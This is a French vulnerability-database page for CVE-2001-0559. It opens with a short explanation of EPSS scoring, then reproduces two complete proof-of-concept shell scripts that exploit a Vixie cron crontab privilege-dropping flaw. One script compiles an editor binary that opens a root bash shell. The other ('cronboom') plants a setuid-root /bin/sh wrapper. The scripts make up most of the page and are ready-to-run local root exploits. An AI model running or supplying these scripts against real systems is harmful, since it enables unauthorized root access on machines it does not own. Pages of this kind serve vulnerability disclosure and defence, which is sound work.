CVE-2001-0559 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

source: https://www.securityfocus.com/bid/2687/info Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times. When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations. This vulnerability may be exploited to gain root privileges locally. #!/bin/bash clear echo ".-----------------------------------------------------------." echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |" echo "|===========================================================|" echo "| Sebastian Krahmer <[email protected]> |" echo "| Michal Zalewski <[email protected]> |" echo "\`-----------------------------------------------------------'" echo test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab echo ">>> Using binary: $CRONBIN" echo -n ">>> Setuid check: " if [ -u $CRONBIN ]; then echo "PASSED" else echo "FAILED" echo exit 1 fi echo -n ">>> Version check: " QQ=`strings $CRONBIN | grep '43 vixie Exp'` if [ "$QQ" = "" ]; then echo "FAILED" echo exit 1 else echo "PASSED" fi echo ">>> Building exploit..." cat >edit0r.c <<_eof_ #include <stdio.h> int main(int argc,char* argv[]) { sleep(1); if (geteuid()) { FILE* x=fopen(argv[1],"w"); fprintf(x,"blah blah blah\n"); fclose(x); } else { dup2(1,0); dup2(1,2); printf("\n>>> Entering rootshell, babe...\n"); system("touch $HOME/.xploited"); system("bash"); } } _eof_ gcc edit0r.c -o edit0r &>/dev/null rm -f edit0r.c if [ ! -f edit0r ]; then echo ">>> Cannot compile exploit." echo exit 1 fi rm -f ~/.xploited echo ">>> Performing attack..." ( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null rm -f edit0r if [ -f ~/.xploited ]; then echo echo ">>> Thank you." rm -f ~/.xploited echo exit 0 else echo echo ">>> Apparently I am not able to exploit it, sorry..." echo exit 1 fi

source: https://www.securityfocus.com/bid/2687/info Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times. When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations. This vulnerability may be exploited to gain root privileges locally. #!/bin/sh # # cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1 # # synopsis: # the crontab file maintenance program (crontab) fails to drop privileges # before invoking the editor under certain circumstances. # # description: # a serialization error exists in some versions of the file maintenance # program, crontab. the vulnerability was introduced in versions which # were patched for seperate vulnerability in fall of 2000 (see Bugtraq # ID #1960). # # when a parsing error occurs after a modification operation, crontab will # fail to drop privileges correctly for subsequent modification operations. # because the program is installed setuid root, it may be possible for a # local user to gain root privileges. # # affected versions: # cron_3.0pl1-57.2 distributed with Debian Linux 2.2. # # note that copies of the program with the patch mentioned above are likely # to also be vulnerable. # # references: # https://www.securityfocus.com/bid/2687 # # 05/07/01 [email protected] CRONTAB=/usr/bin/crontab if ! test -x $CRONTAB; then echo "** unable to locate crontab executable, exiting" exit 1 fi cat > vcsh.c << EOF #include <unistd.h> int main() { setuid(0); setgid(0); execl("/bin/sh", "sh", NULL); } EOF echo "** compiling shell wrapper as $PWD/vcsh" cc -o $PWD/vcsh $PWD/vcsh.c if ! test -x $PWD/vcsh; then echo "** compilation failed, exiting" exit 1 fi echo "** creating simple exploit script as $PWD/vcex.sh" cat > vcex.sh << EOF #!/bin/sh sleep 1 && echo "foo" >> \$1 if test -f $PWD/vcboom; then chown root.root $PWD/vcsh chmod 4755 $PWD/vcsh rm $PWD/vcboom else touch $PWD/vcboom fi EOF chmod 0755 $PWD/vcex.sh echo "** running $CRONTAB -e" echo "**" echo "** enter 'yes' at the first prompt, then enter 'no' at the second" echo (EDITOR=$PWD/vcex.sh $CRONTAB -e) echo echo "** done, the shell wrapper should be suid root" exit 0